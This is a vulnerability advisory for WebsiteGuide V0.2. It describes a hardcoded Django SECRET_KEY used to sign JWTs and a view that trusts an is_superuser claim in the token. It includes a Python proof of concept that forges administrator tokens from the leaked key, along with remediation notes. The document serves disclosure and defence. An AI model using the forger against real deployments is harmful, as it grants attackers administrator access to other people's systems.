Exploit Title: WebsiteGuide V0.2 Using insecure jwt for identity authentication
Date: 2023/11/9
Exploit Author: 5x
Vendor Homepage: https://github.com/mizhexiaoxiao/WebsiteGuide
Software Link: git clone https://github.com/mizhexiaoxiao/WebsiteGuide.git
Version: V0.2
Tested on: Linux
In WebsiteGuide/settings.py no JWT-specific signing key is configured. The only JWT setting present is the token expiration time (5 days); JWT_SECRET_KEY is not set, so the key used to sign JWTs is never chosen explicitly.
In that case Django REST framework JWT (djangorestframework-jwt) falls back to Django's SECRET_KEY as the HS256 signing key.
That SECRET_KEY is hardcoded in the settings file committed to the public repository rather than being a strong, randomly generated, per-deployment value. Anyone who reads the repository therefore knows the signing key and can mint tokens of their own that pass the application's signature check, bypassing JWT authentication.
WebsiteGuide/settings.py
In WebsiteGuide/websiteapp/views.py, the UserAuthView class decides whether a request carries administrator privileges by reading the is_superuser field from the JWT payload, so a forged token with is_superuser set to true is enough to be treated as an administrator.
WebsiteGuide/websiteapp/views.py::UserAuthView
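The following is an added example, not code from WebsiteGuide or from the advisory author. It reproduces the two halves of the issue above with only the Python standard library: a verifier that behaves like DRF-JWT with JWT_SECRET_KEY unset (HS256 over SECRET_KEY, plus an exp check), a privilege check that trusts is_superuser from the payload the way UserAuthView is described to, and a forger that mints an admin token from the leaked key. The secret value, the claim names and the user_id are placeholders chosen for the example; the real SECRET_KEY and the exact payload shape come from the repository, which the advisory does not reproduce.

```python
"""Forging a WebsiteGuide-style admin JWT from a leaked Django SECRET_KEY.

Added example (stdlib only). The secret, claim names and user id below are
constructed placeholders, not values taken from the WebsiteGuide repository.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Placeholder standing in for the hardcoded value in WebsiteGuide/settings.py.
LEAKED_SECRET_KEY = "django-insecure-placeholder-secret-from-settings-py"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(payload: dict, secret: str) -> str:
    """Build an HS256 JWT: base64url(header).base64url(payload).base64url(hmac)."""
    header = {"alg": "HS256", "typ": "JWT"}
    compact = {"separators": (",", ":")}
    signing_input = (
        _b64url(json.dumps(header, **compact).encode())
        + "."
        + _b64url(json.dumps(payload, **compact).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_jwt(token: str, secret: str, now: Optional[float] = None) -> Optional[dict]:
    """Mimic DRF-JWT with JWT_SECRET_KEY unset: HS256 over Django's SECRET_KEY,
    then an exp check. Returns the payload on success, None on any failure."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    payload = json.loads(_b64url_decode(p))
    now = time.time() if now is None else now
    if payload.get("exp", 0) <= now:
        return None
    return payload


def is_admin_request(token: str, secret: str, now: Optional[float] = None) -> bool:
    """Models the UserAuthView logic described in the advisory: administrator
    status is taken straight from the is_superuser claim in the token."""
    payload = verify_jwt(token, secret, now)
    return bool(payload and payload.get("is_superuser"))


def forge_admin_token(secret: str, username: str = "attacker",
                      days: int = 5, now: Optional[int] = None) -> str:
    """What an attacker who read settings.py can do: sign an arbitrary payload
    (placeholder claim names) with the leaked key and a fresh 5-day expiry."""
    now = int(time.time()) if now is None else now
    payload = {
        "user_id": 1,
        "username": username,
        "is_superuser": True,
        "exp": now + days * 86400,
    }
    return sign_jwt(payload, secret)


def generate_secret_key(nbytes: int = 50) -> str:
    """The corrective: a per-deployment random key to load from the environment
    (for both SECRET_KEY and JWT_SECRET_KEY) instead of a value in the repo."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    forged = forge_admin_token(LEAKED_SECRET_KEY)
    print("forged token accepted as admin:", is_admin_request(forged, LEAKED_SECRET_KEY))
    print("same token against a rotated key:", is_admin_request(forged, generate_secret_key()))
```

The forged token is accepted only because the server's key is public; rotating SECRET_KEY to a random per-deployment value (and setting JWT_SECRET_KEY separately) invalidates it, but the second defect remains until UserAuthView looks up is_superuser from the user record rather than trusting the claim.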